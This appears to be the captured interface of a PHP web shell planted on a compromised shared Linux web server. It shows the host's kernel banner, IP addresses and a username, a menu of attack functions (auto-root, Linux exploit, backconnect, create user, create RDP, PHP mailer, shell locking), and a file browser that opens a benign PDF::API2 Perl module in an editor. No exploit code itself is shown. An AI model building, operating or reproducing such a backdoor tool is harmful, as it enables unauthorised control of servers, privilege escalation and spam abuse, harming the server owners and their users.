Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
PDF /
API2 /
Basic /
PDF /
[ HOME SHELL ]
Name
Size
Permission
Action
Filter
[ DIR ]
drwxr-xr-x
Array.pm
2.5
KB
-rw-r--r--
Bool.pm
798
B
-rw-r--r--
Dict.pm
9.69
KB
-rw-r--r--
File.pm
47.38
KB
-rw-r--r--
Filter.pm
3.11
KB
-rw-r--r--
Literal.pm
2.14
KB
-rw-r--r--
Name.pm
2.68
KB
-rw-r--r--
Null.pm
1.27
KB
-rw-r--r--
Number.pm
750
B
-rw-r--r--
Objind.pm
7.27
KB
-rw-r--r--
Page.pm
2.1
KB
-rw-r--r--
Pages.pm
10.23
KB
-rw-r--r--
String.pm
5
KB
-rw-r--r--
Utils.pm
2.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Literal.pm
# Literal PDF Object for Dirty Hacks ... package PDF::API2::Basic::PDF::Literal; use base 'PDF::API2::Basic::PDF::Objind'; use strict; our $VERSION = '2.043'; # VERSION use PDF::API2::Basic::PDF::Filter; use PDF::API2::Basic::PDF::Name; use Scalar::Util qw(blessed); no warnings qw[ deprecated recursion uninitialized ]; sub new { my ($class, @opts) = @_; my ($self); $class = ref $class if ref $class; $self = $class->SUPER::new(@_); $self->{' realised'} = 1; if(scalar @opts > 1) { $self->{-isdict}=1; my %opt=@opts; foreach my $k (keys %opt) { $self->{$k} = $opt{$k}; } } elsif(scalar @opts == 1) { $self->{-literal}=$opts[0]; } return $self; } sub outobjdeep { my ($self, $fh, $pdf) = @_; if($self->{-isdict}) { if(defined $self->{' stream'}) { $self->{Length} = length($self->{' stream'}) + 1; } else { delete $self->{Length}; } $fh->print("<< "); foreach my $k (sort keys %{$self}) { next if($k=~m|^[ \-]|o); $fh->print('/'.PDF::API2::Basic::PDF::Name::string_to_name($k).' '); if(ref($self->{$k}) eq 'ARRAY') { $fh->print('['.join(' ',@{$self->{$k}})."]\n"); } elsif(ref($self->{$k}) eq 'HASH') { $fh->print('<<'.join(' ', map { '/'.PDF::API2::Basic::PDF::Name::string_to_name($_).' '.$self->{$k}->{$_} } sort keys %{$self->{$k}})." >>\n"); } elsif(blessed($self->{$k}) and $self->{$k}->can('outobj')) { $self->{$k}->outobj($fh, $pdf); $fh->print("\n"); } else { $fh->print("$self->{$k}\n"); } } $fh->print(">>\n"); if(defined $self->{' stream'}) { $fh->print("stream\n$self->{' stream'}\nendstream"); # next is endobj which has the final cr } } else { $fh->print($self->{-literal}); # next is endobj which has the final cr } } sub val { $_[0]; } 1;
Close